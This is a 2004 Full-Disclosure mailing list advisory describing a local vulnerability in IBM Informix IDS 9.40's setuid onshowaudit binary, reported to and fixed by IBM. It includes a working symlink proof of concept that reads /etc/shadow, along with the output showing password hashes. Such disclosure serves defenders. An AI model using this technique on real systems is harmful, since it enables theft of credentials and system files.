From pask@open3s.com Thu Jan 29 20:44:46 2004 From: pask@open3s.com To: "[Full Disclosure]" Date: Tue, 27 Jan 2004 15:34:45 +0100 (CET) Subject: [Full-Disclosure] OPEN3S-2003-08-08-eng-informix-onshowaudit ----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========---------- Title: Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary Date: 08-08-2003 Platform: Only tested in Linux but can be exported to others. Impact: Users with exec perm over ./bin/onshowaudit can read all system files. Author: Juan Manuel Pascual Escriba Status: Solved by IBM Corp PROBLEM SUMMARY: Informix user or any user with AAO privileges can execute onshowaudit. This binary is owned by root.informix with 6755 permision. As the endly point of its execution thread onshowaudit try to read some files in /tmp directory without dropping any privileges. It's easy for an intruder to make a link to /etc/shadow or /root/.ssh/authorized_keys of one of this files and read this files. DESCRIPTION Informix user or any user with AAO privileges an execute onshowaudit. This binary is owned by root.informix with 6755 permision. As the endly point of its execution thread onshowaudit reads 16231 open("/tmp/.0", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) 16231 open("/tmp/.1", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) 16231 open("/tmp/.2", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) .... 16231 open("/tmp/.97", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) 16231 open("/tmp/.98", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) 16231 write(2, "Cannot open file \n", 18) = 18 without dropping privileges. It's easy to make a link: [informix@dimoni tmp]$ ls -alc /etc/shadow -r-------- 1 root root 1020 Aug 10 01:59 /etc/shadow [informix@dimoni tmp]$ ln -s /etc/shadow .0 informix@dimoni tmp]$ /home/informix-9.40/bin/onshowaudit wait for the output .... aaa:!!:11635:0:99999:7::: pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7::: bbb:!!:11636:0:99999:7::: cccc:!!:11636:0:99999:7::: ddddd:!!:11647:0:99999:7::: aaaaaa:!!:11806:0:99999:7::: wwwwww:!!:11833:0:99999:7::: zzz:!!:12027:0:99999:7::: informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7::: Program Over. IMPACT: Any user with AAO privileges over onshowaudit could read any system file. STATUS Reported to IBM security team at 11th of August 2003 See more infomartion about this vulnerability and workaround at: http://www-1.ibm.com/support/docview.wss?uid=swg21153336 This vulnerability was managed in an efficient manner by Jonathan Leffler from IBM Informix Database Engineering Team. -------------------------------------------------- This vulnerability was researched by: Juan Manuel Pascual Escriba pask@open3s.com Barcelona - Spain http://www.open3s.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html